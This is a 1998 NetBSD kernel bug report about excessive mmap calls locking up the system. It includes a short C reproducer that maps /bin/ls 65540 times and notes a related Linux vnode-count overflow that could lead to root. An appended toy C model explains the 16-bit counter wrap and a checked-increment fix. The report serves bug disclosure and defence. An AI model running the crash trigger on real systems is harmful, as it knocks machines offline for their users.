Subject: kern/4804: Excessive mmaps crash system
To: None <gnats-bugs@gnats.netbsd.org>
From: None <dholland@eecs.harvard.edu>
List: netbsd-bugs
Date: 01/11/1998 17:23:36
>Number:         4804
>Category:       kern
>Synopsis:       excessive mmaps in one process crash system
>Confidential:   yes
>Severity:       serious
>Priority:       medium
>Responsible:    kern-bug-people (Kernel Bug People)
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Sun Jan 11 14:50:01 1998
>Last-Modified:
>Originator:     David A. Holland <dholland@eecs.harvard.edu>
>Organization:
   - David A. Holland             |    VINO project home page:
     dholland@eecs.harvard.edu    | http://www.eecs.harvard.edu/vino
>Release:        1.2.1
>Environment:
	
System: NetBSD chianti.eecs.harvard.edu 1.2.1 NetBSD 1.2.1 (CHIANTI) #1: Tue Sep 9 16:52:39 EDT 1997 root@chianti.eecs.harvard.edu:/usr/src/sys/arch/i386/compile/CHIANTI i386


>Description:
	If you map one file too many times, or make too many mappings in
	one process (haven't determined which yet), the system locks up
	and stops responding to anything but ping.

	I discovered this while testing some code that does unpleasant
	things to Linux. In Linux the problem is related to overflow in
	the vnode use count, which is only 16 bits.

	The Linux problem is more serious in that instead of crashing,
	the system keeps running using free vnodes, which can then be
	exploited to gain root. It is not public yet, but probably will
	be in a few days (hence the confidentiality request).
>How-To-Repeat:


#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>

int main(void)
{
 int fd, i;

 fd = open("/bin/ls", O_RDONLY);
 if (fd < 0) {
  perror("open");
  return 1;
 }

 /* Map the same file 65540 times, one page each, at fixed adjacent addresses. */
 for(i = 0; i < 65540; i++)
 {
  mmap((char*)0x50000000 + (0x1000 * i), 0x1000,
   PROT_READ, MAP_SHARED | MAP_FIXED, fd, 0);
 }
 return 0;
}

>Fix:
	Don't know yet.

>Audit-Trail:
>Unformatted:
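The report attributes the Linux variant to a 16-bit vnode use count that wraps when one file is referenced too many times. The following is an added, stand-alone C model of that counter, not code from the report or from NetBSD or Linux: `struct toy_vnode`, `vref_unchecked`, `vref_checked` and the `simulate_*` helpers are constructed names. It runs the report's own iteration count (65540) through a wrapping 16-bit counter to show how many references are still outstanding when the count reads zero, and beside it a checked increment that refuses the reference instead of wrapping, which is the mitigation a kernel would apply on the mmap path.

```c
#include <stdint.h>
#include <stdio.h>

/* Constructed model of a reference-counted vnode whose use count is only
 * 16 bits wide, as the report says the Linux count was. Illustration only. */
struct toy_vnode {
    uint16_t usecount;
};

/* Unchecked reference: 65535 + 1 wraps silently to 0. */
static void vref_unchecked(struct toy_vnode *vp)
{
    vp->usecount++;
}

/* Checked reference: refuse the new reference instead of wrapping.
 * Returns 0 on success, -1 when the counter is saturated; a caller such as
 * an mmap path would then fail the request (e.g. with ENOMEM). */
static int vref_checked(struct toy_vnode *vp)
{
    if (vp->usecount == UINT16_MAX)
        return -1;
    vp->usecount++;
    return 0;
}

/* Take n references with the unchecked counter; return the stored count. */
static unsigned simulate_unchecked(unsigned long n)
{
    struct toy_vnode v = { 0 };
    for (unsigned long i = 0; i < n; i++)
        vref_unchecked(&v);
    return v.usecount;
}

/* Take n references with the unchecked counter, then release them one at
 * a time until the count reads 0, the point at which a kernel would put the
 * vnode back on its free list. Return how many references are still
 * outstanding at that moment; anything above 0 is a vnode freed while in use. */
static unsigned long outstanding_when_freed(unsigned long n)
{
    struct toy_vnode v = { 0 };
    unsigned long released = 0;
    for (unsigned long i = 0; i < n; i++)
        vref_unchecked(&v);
    while (v.usecount != 0) {
        v.usecount--;
        released++;
    }
    return n - released;
}

/* Take up to n references with the checked counter; return how many succeeded. */
static unsigned long simulate_checked(unsigned long n)
{
    struct toy_vnode v = { 0 };
    unsigned long ok = 0;
    for (unsigned long i = 0; i < n; i++)
        if (vref_checked(&v) == 0)
            ok++;
    return ok;
}

int main(void)
{
    unsigned long n = 65540;  /* the iteration count from the report's repro */
    printf("unchecked: count after %lu refs = %u\n", n, simulate_unchecked(n));
    printf("unchecked: refs outstanding when count reaches 0 = %lu\n",
           outstanding_when_freed(n));
    printf("checked:   refs granted out of %lu = %lu\n", n, simulate_checked(n));
    return 0;
}
```

With 65540 references the unchecked counter reads 4, so four releases bring it to zero while 65536 mappings still point at the vnode; the checked counter grants 65535 references and rejects the rest, turning a silent wrap into a visible failure the caller can handle.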